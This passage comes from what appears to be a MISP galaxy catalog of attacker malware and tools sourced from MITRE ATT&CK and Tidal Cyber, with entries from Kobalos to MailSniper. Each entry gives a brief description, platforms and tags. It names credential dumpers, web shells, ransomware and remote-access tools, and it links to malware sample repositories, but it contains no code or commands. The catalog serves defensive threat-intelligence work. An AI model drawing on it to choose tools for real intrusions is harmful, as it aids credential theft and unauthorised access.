software_attack_id | S0250 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Kobalos
Kobalos is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. Kobalos has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. Kobalos was first identified in late 2019.[ESET Kobalos Feb 2021][ESET Kobalos Jan 2021]
Internal MISP references
UUID bf918663-90bd-489e-91e7-6951a18a25fd
which can be used as unique global reference for Kobalos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0641 |
source | MITRE |
type | ['malware'] |
KOCTOPUS
KOCTOPUS's batch variant is loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant that has the same functionality as the batch version.[MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 3e13d07d-d9e1-4456-bec3-b2375e404753
which can be used as unique global reference for KOCTOPUS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0669 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Komplex
Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX [XAgentOSX 2017] [Sofacy Komplex Trojan].
Internal MISP references
UUID 2cf1be0d-2fba-4fd0-ab2f-3695716d1735
which can be used as unique global reference for Komplex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0162 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KOMPROGO
KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management. [FireEye APT32 May 2017]
Internal MISP references
UUID 3067f148-2e2b-4aac-9652-59823b3ad4f1
which can be used as unique global reference for KOMPROGO
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0156 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
KONNI
KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[Talos Konni May 2017][Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018][Medium KONNI Jan 2020][Malwarebytes Konni Aug 2021]
Internal MISP references
UUID d381de2a-30cb-4d50-bbce-fd1e489c4889
which can be used as unique global reference for KONNI
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0356 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
KOPILUWAK
KOPILUWAK is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID d09c4459-1aa3-547d-99f4-7ac73b8043f0
which can be used as unique global reference for KOPILUWAK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1075 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Kwampirs
Kwampirs is a backdoor Trojan used by Orangeworm. Kwampirs has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines.[Symantec Orangeworm April 2018] Kwampirs has multiple technical overlaps with Shamoon based on reverse engineering analysis.[Cylera Kwampirs 2022]
Internal MISP references
UUID 35ac4018-8506-4025-a9e3-bd017700b3b3
which can be used as unique global reference for Kwampirs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0236 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Launch-VsDevShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet
Author: Nasreddine Bencherchali
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
Resources: * https://twitter.com/nas_bench/status/1535981653239255040
Detection: * Sigma: proc_creation_win_lolbin_launch_vsdevshell.yml[Launch-VsDevShell.ps1 - LOLBAS Project]
Internal MISP references
UUID 288b2ab2-255a-457a-a6eb-02ee4711d6b8
which can be used as unique global reference for Launch-VsDevShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5258 |
source | Tidal Cyber |
tags | ['5be0da70-9249-44fa-8c3b-7394ef26b2e0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
LaZagne
LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[GitHub LaZagne Dec 2018]
Internal MISP references
UUID f5558af4-e3e2-47c2-b8fe-72850bd30f37
which can be used as unique global reference for LaZagne
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0349 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '26c5dec7-3184-4873-ae20-9558a498a27f', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ldifde
Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".[Ldifde Microsoft]
Internal MISP references
UUID d0ff555f-ba74-457c-b6e4-02962c230b60
which can be used as unique global reference for Ldifde
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5017 |
source | Tidal Cyber |
tags | ['cea43301-9f7a-46a5-be3a-3a09f0f3c09e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LEMURLOOT
LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.[Mandiant MOVEit Transfer June 2 2023]
Related Vulnerabilities: CVE-2023-34362[U.S. CISA CL0P CVE-2023-34362 Exploitation][Mandiant MOVEit Transfer June 2 2023]
Internal MISP references
UUID d5d79a51-3756-40de-81cd-4dac172fbb74
which can be used as unique global reference for LEMURLOOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5020 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '173e1480-8d9b-49c5-854d-594dde9740d6', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Level
According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID bce485ad-7d4f-45b6-b3c1-218f2f757611
which can be used as unique global reference for Level
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5067 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LightNeuron
LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of LightNeuron exists.[ESET LightNeuron May 2019]
Internal MISP references
UUID c9d2f023-d54b-4d08-9598-a42fb92b3161
which can be used as unique global reference for LightNeuron
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0395 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LIGHTWIRE
LIGHTWIRE is a web shell written in Perl that was used during Cutting Edge to maintain access and enable command execution by imbedding into the legitimate compcheckresult.cgi component of Ivanti Secure Connect VPNs.[Mandiant Cutting Edge Part 2 January 2024][Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 1b3af76f-f9a1-58ce-8c7d-aec535f8d0c0
which can be used as unique global reference for LIGHTWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1119 |
source | MITRE |
type | ['malware'] |
Ligolo
Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3113cb05-23b4-4f90-ab7a-623b800302ce
which can be used as unique global reference for Ligolo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5034 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Line Dancer
Line Dancer is one of the two key tools used during the ArcaneDoor network device intrusions, serving as an in-memory implant used to upload capabilities permitting arbitrary code execution and persistence (Line Runner).[Cisco Talos ArcaneDoor April 24 2024]
Internal MISP references
UUID 80412b83-74e4-4bea-b05b-84b00f41db69
which can be used as unique global reference for Line Dancer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5284 |
source | Tidal Cyber |
tags | ['a159c91c-5258-49ea-af7d-e803008d97d3', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', '6bb2f579-a5cd-4647-9dcd-eff05efe3679', '9768aada-9d63-4d46-ab9f-d41b8c8e4010', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3'] |
type | ['malware'] |
Line Runner
Line Runner is one of the two key tools (along with Line Dancer) used during the ArcaneDoor network device intrusion. Line Runner is used to maintain persistence and execute commands on compromised devices.[Cisco Talos ArcaneDoor April 24 2024]
Internal MISP references
UUID 60bb6282-9eb8-4640-9d79-69c0c8ee0e0b
which can be used as unique global reference for Line Runner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Network'] |
software_attack_id | S5285 |
source | Tidal Cyber |
tags | ['a159c91c-5258-49ea-af7d-e803008d97d3', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'c25f341a-7030-4688-a00b-6d637298e52e', '9768aada-9d63-4d46-ab9f-d41b8c8e4010', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', '2e85babc-77cd-4455-9c6e-312223a956de'] |
type | ['malware'] |
Linfo
Linfo is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Linfo May 2012]
Internal MISP references
UUID 925975f8-e8ff-411f-a40e-f799968046f7
which can be used as unique global reference for Linfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0211 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Linux Rabbit
Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[Anomali Linux Rabbit 2018]
Internal MISP references
UUID d017e133-fce9-4982-a2df-6867a80089e7
which can be used as unique global reference for Linux Rabbit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0362 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', '70dc52b0-f317-4134-8a42-71aea1443707'] |
type | ['malware'] |
LiteDuke
LiteDuke is a third stage backdoor that was used by APT29, primarily in 2014-2015. LiteDuke used the same dropper as PolyglotDuke, and was found on machines also compromised by MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 71e4028c-9ca1-45ce-bc44-98209ae9f6bd
which can be used as unique global reference for LiteDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0513 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LitePower
LitePower is a downloader and second stage malware that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID cc568409-71ff-468b-9c38-d0dd9020e409
which can be used as unique global reference for LitePower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0680 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LITTLELAMB.WOOLTEA
LITTLELAMB.WOOLTEA is a backdoor that was used by UNC5325 during Cutting Edge to deploy malware on targeted Ivanti Connect Secure VPNs and to establish persistence across system upgrades and patches.[Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID c9c5e7ad-6e95-5d53-b4db-f6b51c7167ca
which can be used as unique global reference for LITTLELAMB.WOOLTEA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1121 |
source | MITRE |
type | ['malware'] |
Lizar
Lizar is a modular remote access tool written using the .NET Framework that shares structural similarities to Carbanak. It has likely been used by FIN7 since at least February 2021.[BiZone Lizar May 2021][Threatpost Lizar May 2021][Gemini FIN7 Oct 2021]
Internal MISP references
UUID 65d46aab-b3ce-4f5b-b1fc-871db2573fa1
which can be used as unique global reference for Lizar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0681 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockBit 3.0
Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[U.S. CISA Understanding LockBit June 2023]
LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[U.S. CISA Understanding LockBit June 2023] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive" than previous LockBit strains.[U.S. CISA LockBit 3.0 March 2023]
According to data collected by the ransomwatch project and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[GitHub ransomwatch]
Delivered By: Cobalt Strike[Sentinel Labs LockBit 3.0 July 2022], PsExec[NCC Group Research Blog August 19 2022]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/
PulseDive (IOCs): https://pulsedive.com/threat/LockBit
Internal MISP references
UUID 08c70ea5-9d4d-4146-826e-c5ebd5490378
which can be used as unique global reference for LockBit 3.0
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5047 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '5e7433ad-a894-4489-93bc-41e90da90019', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LockerGoga
LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[Unit42 LockerGoga 2019][CarbonBlack LockerGoga 2019]
Internal MISP references
UUID 65bc8e81-0a08-49f6-9d04-a2d63d512342
which can be used as unique global reference for LockerGoga
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0372 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LoFiSe
LoFiSe has been used by ToddyCat since at least 2023 to identify and collect files of interest on targeted systems.[Kaspersky ToddyCat Check Logs October 2023]
Internal MISP references
UUID d28c3706-df25-59e2-939f-131abaf8a1eb
which can be used as unique global reference for LoFiSe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1101 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LogMeIn
LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[LogMeIn Homepage] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[CISA Royal AA23-061A March 2023][CSRB LAPSUS$ July 24 2023]
Internal MISP references
UUID 7b471178-30a1-4c48-bbff-c4d2fdbb35a9
which can be used as unique global reference for LogMeIn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5073 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoJax
LoJax is a UEFI rootkit used by APT28 to persist remote access software on targeted systems.[ESET LoJax Sept 2018]
Internal MISP references
UUID 039f34e9-f379-4a24-a53f-b28ba579854c
which can be used as unique global reference for LoJax
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0397 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lokibot
Lokibot is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. Lokibot can also create a backdoor into infected systems to allow an attacker to install additional payloads.[Infoblox Lokibot January 2019][Morphisec Lokibot April 2020][CISA Lokibot September 2020]
Internal MISP references
UUID 4fead65c-499d-4f44-8879-2c35b24dac68
which can be used as unique global reference for Lokibot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0447 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LookBack
LookBack is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using LookBack.[Proofpoint LookBack Malware Aug 2019][Dragos TALONITE][Dragos Threat Report 2020]
Internal MISP references
UUID bfd2a077-5000-4500-82c4-5c85fb98dd5a
which can be used as unique global reference for LookBack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0582 |
source | MITRE |
type | ['malware'] |
LostMyPassword
LostMyPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 41041d5d-0866-4a57-92b7-d075d8b344ad
which can be used as unique global reference for LostMyPassword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5035 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoudMiner
LoudMiner is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.[ESET LoudMiner June 2019]
Internal MISP references
UUID f503535b-406c-4e24-8123-0e22fec995bb
which can be used as unique global reference for LoudMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0451 |
source | MITRE |
tags | ['a2e000da-8181-4327-bacd-32013dbd3654'] |
type | ['malware'] |
LOWBALL
LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations. [FireEye admin@338]
Internal MISP references
UUID fce1117a-e699-4aef-b1fc-04c3967acc33
which can be used as unique global reference for LOWBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0042 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lslsass
Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process. [Mandiant APT1]
Internal MISP references
UUID 37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc
which can be used as unique global reference for Lslsass
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0121 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Lucifer
Lucifer is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.[Unit 42 Lucifer June 2020]
Internal MISP references
UUID 723d9a27-74fd-4333-a8db-63df2a8b4dd4
which can be used as unique global reference for Lucifer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0532 |
source | MITRE |
type | ['malware'] |
Lurid
Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006. [Villeneuve 2014] [Villeneuve 2011]
Internal MISP references
UUID 0cc9e24b-d458-4782-a332-4e4fd68c057b
which can be used as unique global reference for Lurid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0010 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Machete
Machete is a cyber espionage toolset used by Machete. It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[ESET Machete July 2019][Securelist Machete Aug 2014][360 Machete Sep 2020]
Internal MISP references
UUID be8a1630-9562-41ad-a621-65989f961a10
which can be used as unique global reference for Machete
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0409 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MacMa
MacMa is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. MacMa has been observed in the wild since November 2021.[ESET DazzleSpy Jan 2022]
Internal MISP references
UUID 7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb
which can be used as unique global reference for MacMa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S1016 |
source | MITRE |
type | ['malware'] |
macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[SentinelLabs reversing run-only applescripts 2021][VMRay OSAMiner dynamic analysis 2021]
Internal MISP references
UUID 74feb557-21bc-40fb-8ab5-45d3af84c380
which can be used as unique global reference for macOS.OSAMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S1048 |
source | MITRE |
type | ['malware'] |
MacSpy
MacSpy is a malware-as-a-service offered on the darkweb [objsee mac malware 2017].
Internal MISP references
UUID e5e67c67-e658-45b5-850b-044312be4258
which can be used as unique global reference for MacSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0282 |
source | MITRE |
type | ['malware'] |
Mafalda
Mafalda is a flexible interactive implant that has been used by Metador. Security researchers assess the Mafalda name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. [SentinelLabs Metador Sept 2022]
Internal MISP references
UUID 7506616c-b808-54fb-9982-072a0dcf8a04
which can be used as unique global reference for Mafalda
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1060 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MailSniper
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.[GitHub MailSniper]
Internal MISP references
UUID d762974a-ca7e-45ee-bc1d-f5218bf46c84
which can be used as unique global reference for MailSniper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows', 'Azure AD'] |
software_attack_id | S0413 |
source | MITRE |
